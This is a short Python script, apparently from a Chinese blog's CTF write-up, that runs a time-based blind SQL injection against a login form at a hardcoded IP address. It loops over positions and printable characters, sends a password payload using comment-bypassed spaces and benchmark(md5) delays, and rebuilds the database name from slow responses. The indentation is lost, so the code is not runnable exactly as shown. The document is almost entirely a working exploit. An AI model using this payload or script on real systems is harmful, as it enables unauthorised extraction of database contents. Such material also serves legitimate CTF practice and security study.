import requests
burp0_url = "http://114.115.143.25:32770/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
}
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
query_str = ''
for length in range(1, 20):
for char in all_print_str:
payload = "mochu7'or/**/if(ascii(mid(database(),{0},1))/**/like/**/{1},benchmark(20000000,md5('mochu7')),1)#".format(length, ord(char))
burp0_data = {"username": "admin", "password": payload}
resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
# print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))//响应时间
if resp.elapsed.total_seconds() > 3:
query_str += char
print(query_str)
else:
continue
浙公网安备 33010602011771号